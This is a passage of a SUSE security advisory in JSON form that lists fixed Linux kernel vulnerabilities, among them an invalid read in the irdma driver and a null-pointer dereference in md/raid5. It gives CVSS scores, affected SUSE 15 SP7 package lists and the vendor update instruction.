"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71132"
},
{
"cve": "CVE-2025-71133",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71133"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/irdma: avoid invalid read in irdma_net_event\n\nirdma_net_event() should not dereference anything from \"neigh\" (alias\n\"ptr\") until it has checked that the event is NETEVENT_NEIGH_UPDATE.\nOther events come with different structures pointed to by \"ptr\" and they\nmay be smaller than struct neighbour.\n\nMove the read of neigh-\u003edev under the NETEVENT_NEIGH_UPDATE case.\n\nThe bug is mostly harmless, but it triggers KASAN on debug kernels:\n\n BUG: KASAN: stack-out-of-bounds in irdma_net_event+0x32e/0x3b0 [irdma]\n Read of size 8 at addr ffffc900075e07f0 by task kworker/27:2/542554\n\n CPU: 27 PID: 542554 Comm: kworker/27:2 Kdump: loaded Not tainted 5.14.0-630.el9.x86_64+debug #1\n Hardware name: [...]\n Workqueue: events rt6_probe_deferred\n Call Trace:\n \u003cIRQ\u003e\n dump_stack_lvl+0x60/0xb0\n print_address_description.constprop.0+0x2c/0x3f0\n print_report+0xb4/0x270\n kasan_report+0x92/0xc0\n irdma_net_event+0x32e/0x3b0 [irdma]\n notifier_call_chain+0x9e/0x180\n atomic_notifier_call_chain+0x5c/0x110\n rt6_do_redirect+0xb91/0x1080\n tcp_v6_err+0xe9b/0x13e0\n icmpv6_notify+0x2b2/0x630\n ndisc_redirect_rcv+0x328/0x530\n icmpv6_rcv+0xc16/0x1360\n ip6_protocol_deliver_rcu+0xb84/0x12e0\n ip6_input_finish+0x117/0x240\n ip6_input+0xc4/0x370\n ipv6_rcv+0x420/0x7d0\n __netif_receive_skb_one_core+0x118/0x1b0\n process_backlog+0xd1/0x5d0\n __napi_poll.constprop.0+0xa3/0x440\n net_rx_action+0x78a/0xba0\n handle_softirqs+0x2d4/0x9c0\n do_softirq+0xad/0xe0\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71133",
"url": "https://www.suse.com/security/cve/CVE-2025-71133"
},
{
"category": "external",
"summary": "SUSE Bug 1256733 for CVE-2025-71133",
"url": "https://bugzilla.suse.com/1256733"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71133"
},
{
"cve": "CVE-2025-71135",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71135"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmd/raid5: fix possible null-pointer dereferences in raid5_store_group_thread_cnt()\n\nThe variable mddev-\u003eprivate is first assigned to conf and then checked:\n\n conf = mddev-\u003eprivate;\n if (!conf) ...\n\nIf conf is NULL, then mddev-\u003eprivate is also NULL. In this case,\nnull-pointer dereferences can occur when calling raid5_quiesce():\n\n raid5_quiesce(mddev, true);\n raid5_quiesce(mddev, false);\n\nsince mddev-\u003eprivate is assigned to conf again in raid5_quiesce(), and conf\nis dereferenced in several places, for example:\n\n conf-\u003equiesce = 0;\n wake_up(\u0026conf-\u003ewait_for_quiescent);\n\nTo fix this issue, the function should unlock mddev and return before\ninvoking raid5_quiesce() when conf is NULL, following the existing pattern\nin raid5_change_consistency_policy().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
